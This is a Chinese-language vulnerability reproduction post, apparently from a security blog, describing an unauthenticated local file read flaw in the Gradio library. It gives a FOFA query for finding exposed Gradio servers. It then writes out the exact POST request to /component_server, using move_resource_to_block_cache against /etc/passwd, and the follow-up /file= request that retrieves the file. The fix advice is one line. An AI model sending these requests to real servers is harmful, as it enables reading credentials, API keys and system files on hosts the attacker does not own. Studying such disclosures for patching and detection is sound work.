0x00.产品介绍
Gradio是一个开源的Python库,用于创建机器学习模型的交互式界面。它使得展示和测试模型变得简单快捷,无需深入了解复杂的前端技术。广泛应用于数据科学、教育、研究和软件开发领域,尤其适合于快速原型设计、模型验证、演示和教学。
0x01.漏洞介绍
该漏洞允许未经授权的本地文件读取访问,尤其是当应用程序通过`launch(share=True)`暴露到互联网时,从而允许远程攻击者读取主机机器上的文件。此外,托管在`huggingface.co`上的gradio应用也受到影响,可能导致敏感信息,如存储在环境变量中的API密钥和凭据的泄露。
0x02.漏洞复现
FOFA:body=
"__gradio_mode__"
访问config目录搜索components获取到id的值
填入id的值发送如下请求
POST /component_server HTTP/
1.1
Host: your-ip
User-Agent: Mozilla/
5.0
(Macintosh; Intel Mac OS X
10_15_7
) AppleWebKit/
605.1
.
15
(KHTML, like Gecko) Version/
14.1
.
3
Safari/
605.1
.
1514.1
.
3
Ddg/
14.1
.
3
Connection:
close
Content-Type: application/json
Accept-Encoding: gzip
{
"component_id"
:
"id值"
,
"data"
:
"/etc/passwd"
,
"fn_name"
:
"move_resource_to_block_cache"
,
"session_hash"
:
"a"
}
相应包获取返回的路径
请求如下,将返回的路径填入file参数中请求即可
http://x.x.x.x/file=/tmp/gradio/xxxxxxxxx/passwd
0x03.修复建议
厂商已提供漏洞修补方案,请关注厂商主页及时更新
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论